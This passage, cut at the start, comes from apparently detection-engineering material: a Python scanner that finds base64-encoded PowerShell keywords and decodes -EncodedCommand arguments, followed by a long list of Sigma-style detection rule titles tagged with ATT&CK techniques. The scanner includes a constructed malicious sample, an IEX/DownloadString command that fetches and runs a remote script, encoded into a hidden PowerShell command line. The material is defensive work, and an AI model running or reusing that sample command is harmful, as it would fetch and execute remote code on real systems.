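    variants = []
    for offset in range(3):
        lead = (3 - offset) % 3                  # keyword bytes sharing a group with predecessor bytes
        full_groups = (len(raw) - lead) // 3     # 3-byte groups made only of keyword bytes
        b64 = base64.b64encode(b"\x00" * offset + raw).decode()
        skip = 4 if offset else 0                # drop the group that contains filler bytes
        variants.append(b64[skip:skip + 4 * full_groups])
    return variants


def build_patterns(keywords: List[str]) -> Dict[str, str]:
    """Map each alignment variant (for a few case spellings) back to its canonical keyword."""
    patterns = {}
    for kw in keywords:
        for spelling in {kw, kw.lower(), kw.upper()}:
            for enc in encoded_variants(spelling):
                patterns[enc] = kw
    return patterns


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """
    Recover the script passed via -EncodedCommand. powershell.exe accepts any
    unambiguous prefix of the switch name (-e, -ec, -enc, ...), so every
    '-e<letters>' token is tested as a prefix of 'encodedcommand'.
    """
    for m in re.finditer(r"[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE):
        if "encodedcommand".startswith(m.group(1).lower()):
            try:
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def scan_commandline(cmdline: str, patterns: Dict[str, str]) -> Dict[str, object]:
    """Keyword hits found without decoding, plus the decoded script if one is present."""
    hits = sorted({kw for enc, kw in patterns.items() if enc in cmdline})
    return {"hits": hits, "decoded": decode_encoded_command(cmdline)}


KEYWORDS = ["IEX", "Invoke-Expression", "FromBase64String", "DownloadString", "New-Object"]
PATTERNS = build_patterns(KEYWORDS)

# Constructed samples: the malicious one is encoded here exactly as PowerShell expects.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SAMPLE_CMD = "powershell.exe -nop -w hidden -enc " + base64.b64encode(
    SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
BENIGN_CMD = r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"

if __name__ == "__main__":
    for name, cmd in (("encoded", SAMPLE_CMD), ("benign", BENIGN_CMD)):
        print(name, scan_commandline(cmd, PATTERNS))
```

Short keywords give short variants (the offset-1 and offset-2 forms of `IEX` are four characters), which will eventually collide with unrelated base64; production rules extend each variant with the partially-determined neighbouring characters and pair several keywords, which is why the listed rules carry several strings per keyword rather than one.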
Potential Powershell ReverseShell Connection · Oct 18, 2023 · attack.execution, attack.t1059.001
Potential Provlaunch.EXE Binary Proxy Execution Abuse · Oct 18, 2023 · attack.defense_evasion, attack.t1218
Potential Recon Activity Using DriverQuery.EXE · Oct 18, 2023 · attack.discovery
Potential Reconnaissance Activity Via GatherNetworkInfo.VBS · Oct 18, 2023 · attack.discovery, attack.execution, attack.t1615, attack.t1059.005
Potential Register_App.Vbs LOLScript Abuse · Oct 18, 2023 · attack.defense_evasion, attack.t1218
Potential SquiblyTwo Technique Execution · Oct 18, 2023 · attack.defense_evasion, attack.t1047, attack.t1220, attack.execution, attack.t1059.005, attack.t1059.007
Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell · Oct 18, 2023 · attack.execution, attack.t1047, attack.t1059.001
Potentially Suspicious Child Process Of WinRAR.EXE · Oct 18, 2023 · attack.execution, attack.t1203
Potentially Suspicious GoogleUpdate Child Process · Oct 18, 2023 · attack.defense_evasion
Potentially Suspicious Rundll32 Activity · Oct 18, 2023 · attack.defense_evasion, attack.t1218.011
Potentially Suspicious WebDAV LNK Execution · Oct 18, 2023 · attack.execution, attack.t1059.001, attack.t1204
Potentially Suspicious Windows App Activity · Oct 18, 2023 · attack.defense_evasion
PowerShell Base64 Encoded FromBase64String Cmdlet · Oct 18, 2023 · attack.defense_evasion, attack.t1140, attack.execution, attack.t1059.001
PowerShell Base64 Encoded IEX Cmdlet · Oct 18, 2023 · attack.execution, attack.t1059.001
PowerShell Base64 Encoded Invoke Keyword · Oct 18, 2023 · attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
PowerShell Download Pattern · Oct 18, 2023 · attack.execution, attack.t1059.001
PowerShell Script Change Permission Via Set-Acl · Oct 18, 2023 · attack.defense_evasion
PowerShell Set-Acl On Windows Folder · Oct 18, 2023 · attack.defense_evasion
Private Keys Reconnaissance Via CommandLine Tools · Oct 18, 2023 · attack.credential_access, attack.t1552.004
Process Memory Dump Via Comsvcs.DLL · Oct 18, 2023 · attack.defense_evasion, attack.credential_access, attack.t1036, attack.t1003.001, car.2013-05-009
PUA - AdvancedRun Execution · Oct 18, 2023 · attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003
PUA - AdvancedRun Suspicious Execution · Oct 18, 2023 · attack.defense_evasion, attack.privilege_escalation, attack.t1134.002
PUA - Netcat Suspicious Execution · Oct 18, 2023 · attack.command_and_control, attack.t1095
PUA - Nmap/Zenmap Execution · Oct 18, 2023 · attack.discovery, attack.t1046
PUA - NSudo Execution · Oct 18, 2023 · attack.execution, attack.t1569.002, attack.s0029
PUA - Potential PE Metadata Tamper Using Rcedit · Oct 18, 2023 · attack.defense_evasion, attack.t1036.003, attack.t1036, attack.t1027.005, attack.t1027
PUA - Process Hacker Execution · Oct 18, 2023 · attack.defense_evasion, attack.discovery, attack.persistence, attack.privilege_escalation, attack.t1622, attack.t1564, attack.t1543
PUA - System Informer Execution · Oct 18, 2023 · attack.persistence, attack.privilege_escalation, attack.discovery, attack.defense_evasion, attack.t1082, attack.t1564, attack.t1543
PUA - IOX Tunneling Tool Execution · Oct 18, 2023 · attack.command_and_control, attack.t1090
Python Inline Command Execution · Oct 18, 2023 · attack.execution, attack.t1059
RDP Connection Allowed Via Netsh.EXE · Oct 18, 2023 · attack.defense_evasion, attack.t1562.004
Recon Information for Export with Command Prompt · Oct 18, 2023 · attack.collection, attack.t1119
Regasm/Regsvcs Suspicious Execution · Oct 18, 2023 · attack.defense_evasion, attack.t1218.009
Remote Access Tool - RURAT Execution From Unusual Location · Oct 18, 2023 · attack.defense_evasion
Renamed AdFind Execution · Oct 18, 2023 · attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002
Renamed AutoHotkey.EXE Execution · Oct 18, 2023 · attack.defense_evasion
Renamed AutoIt Execution · Oct 18, 2023 · attack.defense_evasion, attack.t1027
Renamed CreateDump Utility Execution · Oct 18, 2023 · attack.defense_evasion, attack.t1036, attack.t1003.001
Renamed PAExec Execution · Oct 18, 2023 · attack.defense_evasion, attack.t1202
Script Interpreter Execution From Suspicious Folder · Oct 18, 2023 · attack.execution, attack.t1059
Shadow Copies Creation Using Operating Systems Utilities · Oct 18, 2023 · attack.credential_access, attack.t1003, attack.t1003.002, attack.t1003.003
Share And Session Enumeration Using Net.EXE · Oct 18, 2023 · attack.discovery, attack.t1018
Start Windows Service Via Net.EXE · Oct 18, 2023 · attack.execution, attack.t1569.002
Stop Windows Service Via Net.EXE · Oct 18, 2023 · attack.impact, attack.t1489
Stop Windows Service Via PowerShell Stop-Service · Oct 18, 2023 · attack.impact, attack.t1489
Stop Windows Service Via Sc.EXE · Oct 18, 2023 · attack.impact, attack.t1489
Suspect Svchost Activity · Oct 18, 2023 · attack.defense_evasion, attack.privilege_escalation, attack.t1055
Suspicious Add User to Remote Desktop Users Group · Oct 18, 2023 · attack.persistence, attack.lateral_movement, attack.t1133, attack.t1136.001, attack.t1021.001
Suspicious Advpack Call Via Rundll32.EXE · Oct 18, 2023 · attack.defense_evasion
Suspicious Child Process of AspNetCompiler · Oct 18, 2023 · attack.defense_evasion, attack.t1127
Suspicious Child Process Of BgInfo.EXE · Oct 18, 2023 · attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202
Suspicious Copy From or To System Directory · Oct 18, 2023 · attack.defense_evasion, attack.t1036.003
Suspicious Csi.exe Usage · Oct 18, 2023 · attack.execution, attack.t1072, attack.defense_evasion, attack.t1218
Suspicious Download from Office Domain · Oct 18, 2023 · attack.command_and_control, attack.t1105, attack.t1608
Suspicious DumpMinitool Execution · Oct 18, 2023 · attack.defense_evasion, attack.t1036, attack.t1003.001
Suspicious Electron Application Child Processes · Oct 18, 2023 · attack.execution
Suspicious Encoded PowerShell Command Line · Oct 18, 2023 · attack.execution, attack.t1059.001
Suspicious Execution From GUID Like Folder Names · Oct 18, 2023 · attack.defense_evasion, attack.t1027
Suspicious Execution Of PDQDeployRunner · Oct 18, 2023 · attack.execution
Suspicious Group And Account Reconnaissance Activity Using Net.EXE · Oct 18, 2023 · attack.discovery, attack.t1087.001, attack.t1087.002
Suspicious Invoke-WebRequest Execution · Oct 18, 2023 · attack.command_and_control, attack.t1105
Suspicious Invoke-WebRequest Execution With DirectIP · Oct 18, 2023 · attack.command_and_control, attack.t1105
Suspicious Manipulation Of Default Accounts Via Net.EXE · Oct 18, 2023 · attack.collection, attack.t1560.001
Suspicious Microsoft Office Child Process · Oct 18, 2023 · attack.defense_evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010
Suspicious Microsoft OneNote Child Process · Oct 18, 2023 · attack.t1566, attack.t1566.001, attack.initial_access
Suspicious MSHTA Child Process · Oct 18, 2023 · attack.defense_evasion, attack.t1218.005, car.2013-02-003, car.2013-03-001, car.2014-04-003
Suspicious Mshta.EXE Execution Patterns · Oct 18, 2023 · attack.execution, attack.t1106
Suspicious MsiExec Embedding Parent · Oct 18, 2023 · attack.t1218.007, attack.defense_evasion
Suspicious Msiexec Execute Arbitrary DLL · Oct 18, 2023 · attack.defense_evasion, attack.t1218.007
Suspicious Outlook Child Process · Oct 18, 2023 · attack.execution, attack.t1204.002
Suspicious Parent Double Extension File Execution · Oct 18, 2023 · attack.defense_evasion, attack.t1036.007
Suspicious Powercfg Execution To Change Lock Screen Timeout · Oct 18, 2023 · attack.defense_evasion
Suspicious PowerShell Parent Process · Oct 18, 2023 · attack.execution, attack.t1059.001
Suspicious Process Start Locations · Oct 18, 2023 · attack.defense_evasion, attack.t1036, car.2013-05-002
Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE · Oct 18, 2023 · attack.defense_evasion, attack.t1562.004
Suspicious Program Names · Oct 18, 2023 · attack.execution, attack.t1059
Suspicious Provlaunch.EXE Child Process · Oct 18, 2023 · attack.defense_evasion, attack.t1218
Suspicious Remote Child Process From Outlook · Oct 18, 2023 · attack.execution, attack.t1059, attack.t1202
Suspicious SYSTEM User Process Creation · Oct 18, 2023 · attack.credential_access, attack.defense_evasion, attack.privilege_escalation, attack.t1134, attack.t1003, attack.t1027
Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) · Oct 18, 2023 · attack.credential_access, attack.t1003.003
Suspicious WebDav Client Execution Via Rundll32.EXE · Oct 18, 2023 · attack.exfiltration, attack.t1048.003, cve.2023.23397
Suspicious Windows Defender Registry Key Tampering Via Reg.EXE · Oct 18, 2023 · attack.defense_evasion, attack.t1562.001